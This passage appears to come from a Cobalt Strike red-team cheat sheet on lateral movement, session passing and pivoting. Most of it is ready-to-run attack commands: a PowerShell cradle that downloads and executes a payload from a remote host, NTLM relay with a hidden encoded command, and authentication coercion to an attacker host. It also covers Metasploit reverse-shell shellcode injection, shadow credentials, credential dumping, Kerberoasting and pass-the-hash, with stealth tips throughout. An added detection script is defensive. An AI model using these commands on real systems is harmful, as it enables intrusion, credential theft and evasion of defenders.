beacon> powerpick Invoke-Command -ComputerName srv01,srv02,srv03 -ScriptBlock {hostname}
# Download and execute cradle
beacon> powerpick Invoke-Command -ComputerName srv01.corp.local -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.100/payload.ps1')}
# OPSEC: PSRemoting is widely used and expected
# Generates Event ID 4624 (logon type 3) and WinRM event logs
# Default authentication is Kerberos (better than NTLM)
SMB Relay for Lateral Movement
Usage: Relay NTLM authentication for lateral movement.
# Setup SOCKS proxy on beacon (for ntlmrelayx)
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Configure proxychains on attack machine
$ sudo vim /etc/proxychains.conf
socks5 127.0.0.1 1080 socks_user socks_password
# Setup ntlmrelayx through SOCKS
$ sudo proxychains ntlmrelayx.py -t smb://srv01.corp.local -smb2support --no-http-server --no-wcf-server -c 'powershell -NoP -W Hidden -Enc <BASE64>'
# Setup reverse port forward for SMB
beacon> rportfwd 8445 127.0.0.1 445
# Setup PortBender (WinDivert driver for port redirection)
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
# Force authentication (coerce computer to authenticate to us)
# Method 1: PrinterBug
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe srv01.corp.local <our_IP>
# Method 2: PetitPotam
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe -d corp.local -u jdoe -p password <our_IP> srv01.corp.local
# Connect to relayed session
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Cleanup
beacon> rportfwd stop 8445
beacon> jobs
beacon> jobkill <portbender_job_id>
beacon> shell del C:\Windows\system32\drivers\WinDivert64.sys
Session Management
Beacon to Beacon Communication
Usage: Create additional beacon sessions and manage multiple beacons.
# Spawn new HTTP beacon from DNS beacon (redundancy)
beacon> spawn x64 http_listener
# Spawn SMB beacon for peer-to-peer communication
beacon> spawn x64 smb_listener
# Link to SMB beacon on same machine
beacon> link localhost TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Link to SMB beacon on remote machine
beacon> link srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Unlink SMB beacon (child becomes orphan)
beacon> unlink srv01.corp.local TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
# Spawn TCP beacon for port-forward scenarios
beacon> spawn x64 tcp_listener
# Connect to TCP beacon (after spawning on remote host)
beacon> connect 10.10.10.50 4444
# OPSEC: SMB beacons reduce egress traffic (useful in monitored networks)
# Parent beacon proxies traffic for child beacons
# If parent dies, SMB children become unreachable
Session Passing to Other Frameworks
Foreign Listener (Cobalt Strike to Metasploit)
Usage: Pass session from Cobalt Strike to Metasploit (staged payload - x86 only).
# 1. Setup Metasploit listener on attack machine
$ sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 10.10.5.50
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > set ExitOnSession false
msf6 exploit(multi/handler) > exploit -j
# 2. Create Foreign Listener in Cobalt Strike
# Cobalt Strike > Listeners > Add
# - Name: msf_http
# - Payload: Foreign HTTP
# - Host: 10.10.5.50
# - Port: 8080
# 3. Use jump command with foreign listener
beacon> jump psexec64 srv01.corp.local msf_http
# Alternative: spawn into foreign listener
beacon> spawn x86 msf_http
# OPSEC: Staged payloads are less reliable and more detectable
# Only x86 architecture supported for foreign listeners
# Better to use shellcode injection for stageless payloads
Shellcode Injection (Stageless to Metasploit)
Usage: Inject Metasploit shellcode for stageless session passing.
# 1. Setup Metasploit listener (stageless)
$ sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 10.10.5.50
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set HandlerSSLCert /path/to/cert.pem
msf6 exploit(multi/handler) > exploit -j
# 2. Generate stageless shellcode
$ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.5.50 LPORT=443 -f raw -o /tmp/msf_https_x64.bin
# 3. Upload shellcode to beacon
beacon> upload /tmp/msf_https_x64.bin
# 4. Inject shellcode into new process (spawns new process)
beacon> shspawn x64 C:\Temp\msf_https_x64.bin
# Alternative: Inject into existing process
beacon> shinject <pid> x64 C:\Temp\msf_https_x64.bin
# OPSEC: Stageless payloads are more reliable
# x64 support with stageless
# Creates new process (shspawn) or injects into existing (shinject)
Session Passing to Empire/Covenant
Usage: Pass session to other post-exploitation frameworks.
# Generate Empire/Covenant launcher
# Copy launcher command/script
# Execute in Cobalt Strike beacon
beacon> powerpick <empire_launcher_code>
# Or execute Covenant grunt
beacon> execute-assembly C:\Payloads\GruntHTTP.exe
# OPSEC: Useful for leveraging framework-specific modules
# Multiple C2 channels increase resilience
# Avoid unless specific framework capability needed
Pivoting & Proxying
SOCKS Proxy Configuration
Usage: Establish SOCKS proxy through compromised host for pivoting.
# Start SOCKS5 proxy on Cobalt Strike (recommended)
beacon> socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging
# Alternative: SOCKS4 (if compatibility needed)
beacon> socks 1080 socks4
# Start SOCKS4a proxy
beacon> socks 1080 socks4a
# Stop SOCKS proxy
beacon> socks stop
# List active SOCKS proxies
# View > Proxy Pivots
# Verify proxy on team server
$ sudo ss -tulpn | grep 1080
$ sudo netstat -tulpn | grep 1080
# Configure proxychains on attack machine
$ sudo vim /etc/proxychains4.conf
# Add to end of file:
[ProxyList]
socks5 127.0.0.1 1080 socks_user socks_password
# Alternative: Dynamic chain for multiple proxies
dynamic_chain
[ProxyList]
socks5 127.0.0.1 1080 socks_user socks_password
socks5 127.0.0.1 1081 socks_user2 socks_password2
# Use proxychains with tools
$ proxychains nmap -n -Pn -sT -p445,3389,5985 10.10.20.10
$ proxychains crackmapexec smb 10.10.20.0/24
$ proxychains impacket-wmiexec CORP/jdoe@10.10.20.10
$ proxychains impacket-psexec CORP/jdoe@10.10.20.10
# Use with web browsers (FoxyProxy extension)
# SOCKS5 Host: 127.0.0.1
# Port: 1080
# Username: socks_user
# Password: socks_password
# OPSEC Considerations:
# - SOCKS traffic is encrypted between teamserver and beacon
# - Use authentication to prevent unauthorized access
# - Monitor bandwidth usage (SOCKS can be slow over high-latency beacons)
# - Enable logging to track proxy usage
Reverse Port Forwarding
Usage: Forward traffic from remote host back to team server (inbound to target network).
# Setup reverse port forward (remote port -> local port)
beacon> rportfwd 8080 127.0.0.1 80
# Example: Forward port 8080 on target to port 80 on teamserver
# Target:8080 -> Beacon -> TeamServer:80
# Verify port is listening on target
beacon> shell netstat -ano | findstr 8080
# Create firewall rule on target (if needed)
beacon> powerpick New-NetFirewallRule -DisplayName "WebUpdate" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort 8080
# Test from target network
beacon> powerpick Invoke-WebRequest -Uri http://localhost:8080/payload.ps1
# Access from other hosts in target network
# http://compromised_host:8080/
# Stop reverse port forward
beacon> rportfwd stop 8080
# List active port forwards
beacon> rportfwd
# Remove firewall rule
beacon> powerpick Remove-NetFirewallRule -DisplayName "WebUpdate"
# OPSEC: Reverse port forwards expose team server resources
# Use for payload delivery or C2 redirection
# Clean up firewall rules after operations
Port-to-Port Forwarding (Local)
Usage: Forward local ports on beacon to remote services.
# Forward local port on beacon to remote service
# Syntax: rportfwd_local <local_port> <forward_to_host> <forward_to_port>
# Example: Access internal RDP through beacon
beacon> rportfwd_local 3389 10.10.20.50 3389
# Now connect from teamserver
$ xfreerdp /v:127.0.0.1:3389 /u:admin /p:password
# Access internal web application
beacon> rportfwd_local 8080 10.10.20.100 80
# Browse from attack machine
$ curl http://127.0.0.1:8080
# Stop local port forward
beacon> rportfwd_local stop 8080
# OPSEC: Allows access to internal services without additional tools
# Traffic flows through beacon (encrypted)
Reverse SOCKS with Chisel
Usage: Alternative pivoting using Chisel for more flexible tunneling.
# 1. Start Chisel server on attack machine
$ ./chisel server -p 8000 --reverse --socks5
# 2. Upload Chisel client to target
beacon> upload C:\Tools\chisel_windows_amd64.exe
beacon> mv chisel_windows_amd64.exe chisel.exe
# 3. Connect Chisel client to server
beacon> shell chisel.exe client http://10.10.5.50:8000 R:socks
# 4. Configure proxychains to use localhost:1080
$ sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 1080
# 5. Use proxychains for pivoting
$ proxychains nmap -sT -Pn 10.10.20.0/24
# OPSEC: Chisel uses WebSocket for tunneling
# Appears as HTTPS traffic (stealthier)
# Supports multiple simultaneous tunnels
SSH Tunneling (If SSH Available)
Usage: Use SSH for pivoting when credentials are available.
# Dynamic port forwarding (SOCKS proxy)
$ ssh -D 1080 user@compromised_host.corp.local
# Local port forwarding
$ ssh -L 3389:internal_host:3389 user@compromised_host.corp.local
# Remote port forwarding
$ ssh -R 8080:127.0.0.1:80 user@compromised_host.corp.local
# Reverse dynamic port forwarding (SOCKS)
$ ssh -R 1080 user@compromised_host.corp.local
# OPSEC: SSH is common in Linux environments
# Use for mixed Linux/Windows environments
Windows Built-in Pivoting#
Usage: Change the credential context with native tools so that existing channels reach new hosts (no tool upload).
# Method 1: runas with /netonly (new logon session whose credentials are used only for network access)
beacon> shell runas /netonly /user:CORP\jdoe "mmc.exe"
# runas prompts for the password on the console, which a non-interactive Beacon
# shell cannot answer; Beacon's own make_token CORP\jdoe <password> creates the
# same netonly-style logon without the prompt
# Method 2: Mimikatz Pass-the-Hash (the leading ! runs it as SYSTEM, which sekurlsa needs)
beacon> mimikatz !sekurlsa::pth /domain:CORP /user:jdoe /ntlm:<hash> /run:mmc.exe
# Method 3: PowerShell with explicit credentials
# Get-Credential needs an interactive prompt and every powerpick call runs in a
# fresh process, so build the credential and use it in a single invocation
beacon> powerpick $p = ConvertTo-SecureString 'password' -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential('CORP\jdoe', $p); Invoke-Command -ComputerName 10.10.20.10 -Credential $cred -ScriptBlock { whoami }
# Method 4: Browser-based pivoting
# Point a browser (FoxyProxy in Firefox, Chrome or Edge) at the SOCKS proxy
# Access internal web applications through the browser
# OPSEC: Native methods don't require file uploads
# Blend with legitimate administrative activity, but each still leaves logon events:
# 4624 logon type 9 locally for /netonly and pth, type 3 on the remote host for Invoke-Command
Coercion Attacks for Lateral Movement#
PrinterBug (SpoolSample)#
Usage: Coerce the target's machine account into authenticating to a host we control, for relay or capture.
# Coerce target to authenticate to our listener (syntax: <target> <listener>)
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc01.corp.local attacker.corp.local
# If the listener host has unconstrained delegation, the coerced authentication
# carries the target's TGT; start Rubeus monitor before triggering to catch it
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:5 /nowrap
# Capture the incoming NTLM authentication with Inveigh (this is capture, not relay;
# relay needs Invoke-InveighRelay or ntlmrelayx behind a port forward). Sniffing SMB
# on 445 requires an elevated context.
beacon> powershell-import C:\Tools\Inveigh\Inveigh.ps1
beacon> powerpick Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788
# OPSEC: Abuses MS-RPRN (Print Spooler) RpcRemoteFindFirstPrinterChangeNotificationEx
# Works wherever the Spooler service is running and reachable on the target
# Detectable as a client opening the spoolss named pipe over IPC$ (Security 5145 with
# object access auditing) followed by an outbound SMB authentication from the target
PetitPotam#
Usage: Coerce NTLM authentication via the MS-EFSRPC (Encrypting File System Remote) protocol.
# Unauthenticated coercion (syntax: <listener> <target>); only works on hosts without
# the LSA spoofing fixes that closed the unauthenticated EFSRPC paths (CVE-2021-36942,
# August 2021, and CVE-2022-26925, May 2022)
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe attacker.corp.local dc01.corp.local
# Authenticated coercion: with any domain credential the EFSRPC calls still trigger on patched hosts
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe -d corp.local -u jdoe -p password attacker.corp.local dc01.corp.local
# OPSEC: Exploits EFS RPC protocol
# Microsoft's patches only removed the unauthenticated path; the authenticated variant
# keeps working, and the durable fix is on the receiving side (SMB signing, EPA and
# LDAP signing on AD CS/DCs, NTLM restrictions)
# Use authenticated version if unauthenticated blocked
DFSCoerce#
Usage: Coerce authentication via the MS-DFSNM (DFS Namespace Management) protocol; needs a domain credential.
# Coerce via DFS (syntax: <listener> <target>); the target must run the DFS Namespace
# service, which every domain controller does
beacon> execute-assembly C:\Tools\DFSCoerce\DFSCoerce.exe -d corp.local -u jdoe -p password attacker.corp.local dc01.corp.local
# OPSEC: Alternative to PrinterBug/PetitPotam
# Works when other methods are patched/blocked (Spooler disabled, EFSRPC hardened)
# Detectable as a client opening the netdfs named pipe over IPC$ (Security 5145)
Shadow Credentials Attack#
Usage: Write a key credential into msDS-KeyCredentialLink on a user or computer object, then authenticate as that object with PKINIT. Not a coercion technique itself, but listed here because the write access it needs is what coercion-plus-relay often yields.
# Add key credential to computer object (requires write permission on the attribute, e.g. GenericWrite on the object)
beacon> execute-assembly C:\Tools\Whisker\Whisker.exe add /target:srv01$ /domain:corp.local /dc:dc01.corp.local
# Whisker prints the base64 PFX, its password and the DeviceID; request a TGT with the certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:srv01$ /certificate:<base64_cert> /password:<cert_password> /domain:corp.local /nowrap
# Add /getcredentials to asktgt to also recover the account's NTLM hash through the PKINIT U2U exchange
# Remove key credential (cleanup)
beacon> execute-assembly C:\Tools\Whisker\Whisker.exe remove /target:srv01$ /domain:corp.local /dc:dc01.corp.local /deviceid:<device_id>
# OPSEC: Requires write access to msDS-KeyCredentialLink and a Windows Server 2016 or
# later DC holding a certificate, so that PKINIT is available
# No password reset and no service ticket request, so nothing Kerberoast-like is logged;
# the attribute write does appear as Security 5136 on the DC when directory service
# object auditing is enabled, and Whisker's DeviceID is the cleanup handle
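Detection logic for the four techniques above (PrinterBug, PetitPotam, DFSCoerce, Shadow Credentials), run over constructed Windows Security events. This is an added example, not part of the original page or of any of the tools it names; the events are hand-built dicts, not real logs, and the host and account names (DC01, SRV01, WS07, jdoe) are assumptions. Field names follow the 5145 (network share object accessed) and 5136 (directory service object modified) schemas, with "Computer" standing in for the logging host from the event's System element.

```python
"""Detection logic for coercion (5145) and shadow-credential writes (5136), run
over constructed Windows Security events. Added example, not from the original
page; host and account names are assumptions."""

# RPC named pipes reached over IPC$ by the coercion methods on this page.
# PetitPotam can also ride lsarpc/samr/netlogon, but those carry so much
# legitimate traffic that the pipe name alone is not a usable signal there.
COERCION_PIPES = {
    "spoolss": "MS-RPRN (PrinterBug)",
    "efsrpc": "MS-EFSRPC (PetitPotam)",
    "netdfs": "MS-DFSNM (DFSCoerce)",
}
# 5136 OperationType as logged: %%14674 = Value Added, %%14675 = Value Deleted
VALUE_ADDED = "%%14674"
IPC = "\\\\*\\IPC$"

SAMPLE_EVENTS = [  # constructed sample data
    # PrinterBug and PetitPotam against DC01 from the same workstation
    {"EventID": 5145, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "IpAddress": "10.10.20.50", "ShareName": IPC, "RelativeTargetName": "spoolss"},
    {"EventID": 5145, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "IpAddress": "10.10.20.50", "ShareName": IPC, "RelativeTargetName": "efsrpc"},
    # Ordinary file access on a member server
    {"EventID": 5145, "Computer": "FS01.corp.local", "SubjectUserName": "jdoe",
     "IpAddress": "10.10.20.50", "ShareName": "\\\\*\\Data", "RelativeTargetName": "q3.xlsx"},
    # spoolss pipe on a print server: expected there, and not a DC
    {"EventID": 5145, "Computer": "PRINT01.corp.local", "SubjectUserName": "asmith",
     "IpAddress": "10.10.20.77", "ShareName": IPC, "RelativeTargetName": "spoolss"},
    # Whisker add: jdoe writes a KeyCredential onto SRV01$
    {"EventID": 5136, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=SRV01,OU=Servers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    # A device registering its own key: self-write, benign
    {"EventID": 5136, "Computer": "DC01.corp.local", "SubjectUserName": "WS07$",
     "ObjectDN": "CN=WS07,OU=Workstations,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED},
    # Unrelated attribute change on the same object
    {"EventID": 5136, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=SRV01,OU=Servers,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]


def detect_coercion(events, dc_hosts):
    """5145 events where a client opens a coercion-capable RPC pipe over IPC$ on a
    domain controller. Admin tooling touches these pipes too, so the alert carries
    pipe, source and account for triage rather than for automatic blocking."""
    dcs = {h.lower() for h in dc_hosts}
    alerts = []
    for e in events:
        if e.get("EventID") != 5145 or e.get("Computer", "").lower() not in dcs:
            continue
        if not e.get("ShareName", "").upper().endswith("IPC$"):
            continue
        pipe = e.get("RelativeTargetName", "").lower().lstrip("\\")
        if pipe in COERCION_PIPES:
            alerts.append({"host": e["Computer"], "pipe": pipe,
                           "technique": COERCION_PIPES[pipe],
                           "source": e.get("IpAddress"), "account": e.get("SubjectUserName")})
    return alerts


def detect_shadow_credentials(events, allowed_writers=()):
    """5136 additions to msDS-KeyCredentialLink by a principal other than the
    object itself. Self-writes are how devices and Windows Hello enrolment fill
    the attribute; allowed_writers covers sync accounts (an Azure AD Connect
    service account, for example; assumed here) that legitimately write for others."""
    allowed = {w.lower() for w in allowed_writers}
    alerts = []
    for e in events:
        if e.get("EventID") != 5136 or e.get("OperationType") != VALUE_ADDED:
            continue
        if e.get("AttributeLDAPDisplayName") != "msDS-KeyCredentialLink":
            continue
        writer = e.get("SubjectUserName", "")
        target_cn = e.get("ObjectDN", "").split(",", 1)[0].removeprefix("CN=")
        if writer.lower().rstrip("$") == target_cn.lower() or writer.lower() in allowed:
            continue
        alerts.append({"target": e.get("ObjectDN"), "writer": writer, "dc": e.get("Computer")})
    return alerts
```

Both detections need the right audit policy on the DCs: 5145 requires "Audit Detailed File Share" and 5136 requires "Audit Directory Service Changes" plus a SACL on the objects, neither of which is on by default. The coercion rule keys on the destination being a DC because spoolss on a print server and netdfs on a DFS server are everyday traffic; the shadow-credential rule keys on a third party adding a key rather than on the attribute changing at all.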
Network Reconnaissance Through Pivot#
Network Scanning via SOCKS#
Usage: Scan internal networks through compromised host.
# TCP connect scan: only full connect() calls traverse SOCKS, so no host discovery
# pings (-Pn), no raw-socket scan types (-sT) and no local DNS lookups (-n); resolve
# internal names through the proxy (proxychains proxy_dns) or scan by IP
$ proxychains nmap -n -Pn -sT -p445,3389,5985,5986 10.10.20.0/24 --open
# Service version detection
$ proxychains nmap -n -Pn -sT -sV -p445 10.10.20.0/24
# Script scanning
$ proxychains nmap -n -Pn -sT -p445 --script smb-os-discovery 10.10.20.10
# Fast scan of common ports
$ proxychains nmap -n -Pn -sT -F 10.10.20.0/24
# OPSEC: Use -T2 timing for stealthier scans; every probed port is a separate TCP
# session carried through the beacon, so wide port ranges are slow and conspicuous in C2 traffic
# Avoid UDP scans through SOCKS (UDP is not relayed by Beacon's SOCKS proxy)
# Use CrackMapExec for AD-specific reconnaissance
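The SOCKS5 exchange that proxychains performs for every connect() of the tools above (and that the Chisel R:socks listener in the earlier section answers), written out by hand so the -n / -Pn / -sT constraints are visible in the bytes. This is an added example, not code from the original page or from proxychains, Chisel or Cobalt Strike; the proxy address 127.0.0.1:1080 and the 10.10.20.0/24 targets are assumptions.

```python
"""SOCKS5 CONNECT by hand: the handshake proxychains performs for every TCP
connection it pushes through a pivot (Beacon socks, Chisel R:socks). Added
example, not from the original page; proxy 127.0.0.1:1080 and the 10.10.20.0/24
targets are assumptions."""
import ipaddress
import socket
import struct

SOCKS_VERSION, NO_AUTH, CMD_CONNECT = 5, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
# RFC 1928 reply codes; anything but 0 means the proxy could not reach the target
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def build_greeting() -> bytes:
    """Client hello offering a single method: no authentication."""
    return bytes([SOCKS_VERSION, 1, NO_AUTH])


def build_connect(host: str, port: int) -> bytes:
    """CONNECT request. IP literals go as ATYP 1/4; anything else is sent as a
    domain name (ATYP 3) so the proxy resolves it inside the target network,
    which is why scans through a pivot use -n (no local DNS lookups)."""
    if not 0 <= port <= 0xFFFF:
        raise ValueError("port out of range")
    try:
        ip = ipaddress.ip_address(host)
        addr = bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:
        name = host.encode("idna")
        if not 0 < len(name) <= 255:
            raise ValueError("hostname must be 1..255 bytes")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_reply(data: bytes):
    """Parse a CONNECT reply into (ok, reason, bound_addr, bound_port)."""
    if len(data) < 5 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    n = {ATYP_IPV4: 4, ATYP_IPV6: 16, ATYP_DOMAIN: 1 + data[4]}.get(atyp)
    if n is None or len(data) < 6 + n:
        raise ValueError("unknown address type or truncated reply")
    raw = data[4:4 + n]
    if atyp == ATYP_DOMAIN:
        bound = raw[1:].decode("idna")
    else:
        bound = str((ipaddress.IPv4Address if n == 4 else ipaddress.IPv6Address)(raw))
    port = struct.unpack("!H", data[4 + n:6 + n])[0]
    return rep == 0, REPLY_TEXT.get(rep, f"unknown reply {rep:#x}"), bound, port


def _recv_exact(sock, n):
    """recv() may return short reads; loop until n bytes or the peer closes."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def connect_via_socks(proxy, target, port, timeout=5.0):
    """Open a TCP socket to target:port through the SOCKS5 proxy, which is what
    proxychains does transparently for each connect() of the wrapped tool."""
    sock = socket.create_connection(proxy, timeout=timeout)
    try:
        sock.sendall(build_greeting())
        ver, method = _recv_exact(sock, 2)
        if ver != SOCKS_VERSION or method != NO_AUTH:
            raise ConnectionError("proxy rejected no-auth (or is not SOCKS5)")
        sock.sendall(build_connect(target, port))
        head = _recv_exact(sock, 5)  # VER REP RSV ATYP + first address byte
        n = {ATYP_IPV4: 4, ATYP_IPV6: 16, ATYP_DOMAIN: 1 + head[4]}.get(head[3], 4)
        ok, reason, _, _ = parse_reply(head + _recv_exact(sock, n + 1))
        if not ok:
            raise ConnectionError(f"{target}:{port}: {reason}")
        return sock
    except Exception:
        sock.close()
        raise


def tcp_probe(proxy, target, ports):
    """The -sT -Pn equivalent through the pivot: ports the proxy could CONNECT to."""
    open_ports = []
    for p in ports:
        try:
            connect_via_socks(proxy, target, p).close()
            open_ports.append(p)
        except (ConnectionError, OSError, ValueError):
            pass  # refused, unreachable, timed out or a bad reply: treat as closed
    return open_ports
```

With a pivot listening on 127.0.0.1:1080, `tcp_probe(("127.0.0.1", 1080), "10.10.20.10", [445, 3389, 5985])` returns the subset the proxy could reach, which is all nmap -sT can learn through SOCKS too: there is no SYN/RST distinction, no ICMP, and a "host unreachable" reply from the proxy is the only hint that a host is down rather than filtered. Beacon's SOCKS proxy and Chisel both accept the no-auth method; a proxy that answers the greeting with method 0xFF is refusing it, not broken.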
CrackMapExec via SOCKS#
Usage: Enumerate and exploit through SOCKS proxy.
# SMB enumeration
$ proxychains crackmapexec smb 10.10.20.0/24
# SMB with credentials
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -p password -d CORP
# SMB with hash
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -H <ntlm_hash> -d CORP
# Check local admin access: hosts where the account is a local administrator are tagged (Pwn3d!) in the output
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -p password -d CORP
# Authenticate with a local (non-domain) account instead; --local-auth replaces -d
$ proxychains crackmapexec smb 10.10.20.0/24 -u administrator -p password --local-auth
# Execute commands via SMB
$ proxychains crackmapexec smb 10.10.20.10 -u admin -p password -x "whoami"
# WinRM enumeration
$ proxychains crackmapexec winrm 10.10.20.0/24 -u jdoe -p password -d CORP
# MSSQL enumeration
$ proxychains crackmapexec mssql 10.10.20.0/24 -u sa -p password
# LDAP enumeration
$ proxychains crackmapexec ldap 10.10.20.10 -u jdoe -p password -d CORP --users
# OPSEC: CrackMapExec is fast and efficient
# Can be noisy (one authentication per host, so a /24 sweep is hundreds of 4624/4625 events in seconds)
# Use -t 1 to drop to a single thread and --timeout to slow each attempt for stealth
Impacket Suite via SOCKS#
Usage: Use Impacket tools through SOCKS proxy.
# PSExec (creates a service and drops a binary on ADMIN$: noisy, logs 7045 on the target)
$ proxychains impacket-psexec CORP/jdoe:password@10.10.20.10
# WMIExec (stealthier than PSExec: no service, but command output transits a file on ADMIN$)
$ proxychains impacket-wmiexec CORP/jdoe:password@10.10.20.10
# SMBExec
$ proxychains impacket-smbexec CORP/jdoe:password@10.10.20.10
# DCOMExec
$ proxychains impacket-dcomexec CORP/jdoe:password@10.10.20.10
# Secretsdump (credential extraction; needs local admin on the target)
$ proxychains impacket-secretsdump CORP/jdoe:password@10.10.20.10
# GetUserSPNs (Kerberoasting)
$ proxychains impacket-GetUserSPNs CORP/jdoe:password -dc-ip 10.10.20.10 -request
# GetNPUsers (ASREPRoasting)
$ proxychains impacket-GetNPUsers CORP/jdoe:password -dc-ip 10.10.20.10 -request
# OPSEC: Impacket tools are Python-based and flexible
# Support multiple authentication methods (-hashes LM:NT for pass-the-hash, -k for Kerberos)
# For Kerberos, export a ccache in KRB5CCNAME and pass -k -no-pass; address the target by
# hostname rather than IP so the SPN matches, and no NTLM exchange is produced